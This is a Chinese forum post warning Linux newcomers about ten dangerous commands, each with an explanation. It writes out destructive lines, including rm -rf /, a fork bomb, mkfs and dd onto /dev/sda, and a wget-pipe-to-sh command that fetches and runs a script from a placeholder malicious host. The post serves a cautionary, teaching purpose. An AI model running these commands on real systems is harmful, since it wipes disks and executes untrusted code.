[STM32MP1] Linux里这10个最危险的命令,新手须知

楼主(2022-02-21):
RF, AC, AD, ar, linux, sd

Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么推荐阅读快速上手linux

这篇**将会向你介绍十条命令,但你最好不要尝试着去使用。

当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。

1. rm -rf 命令

rm -rf命令是删除文件夹及其内容最快的方式之一。

仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。

下列是一些rm 命令的选项:

rm命令在Linux下通常用来删除文件。

rm -r 命令递归的删除文件夹,甚至是空的文件夹。

rm -f 命令能不经过询问直接删除‘只读文件’。Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。

rm -rf / : 强制删除根目录下所有东东。

rm -rf *:强制删除当前目录的所有文件。

rm -rf . : 强制删除当前文件夹及其子文件夹。

从现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)

2. :{:|:&};: 命令

这就是个fork 炸*的实例。

具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

3. 命令> /dev/sda

这个命令会将某个‘命令‘的输出写到块设备/dev/sda中。

该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

4. mv 文件夹 /dev/null

这个命令会移动某个‘文件夹‘到/dev/null。

在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。

当然,要说明的是这个命令并不能阻止数据恢复软件——所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成。

5. wget http://malicious_source -O- | sh

该命令会从一个(也许是)恶意源下载一个脚本并执行。

Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。

注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。

6. mkfs.ext3 /dev/sda

上列命令会格式化块设备‘sda’,在执行这个命令后你的块设备(硬盘驱动器)会被格式化,直接让你的系统达到不可恢复的阶段。

通常我们不会直接使用/dev/sda这样的设备,除非是作为raw设备使用。

一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁灭性的,上面的数据都会被蒸发了。

7. > file

这个命令常用来清空文件内容或记录命令输出。

不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。

你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。

如果用上列执行时输入错误或无知的输入类似 “> xt.conf”的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令用来编辑先前运行的命令而无需重打整个命令。

用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。

9. dd if=/dev/random of=/dev/sda

这个命令会向块设备sda写入随机的垃圾文件从而擦出数据,让你的系统可能陷入混乱和不可恢复的状态。

记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。

10. 隐藏命令

下面的命令其实就是上面第一个命令 (rm -rf)。

这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄,如果在终端里运行下面命令可能会擦除你的根分区。

真正的危险是隐藏起来的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。

切记,千万不要编译/运行从未知来源的代码。

网友A:
就是有可能误操作呗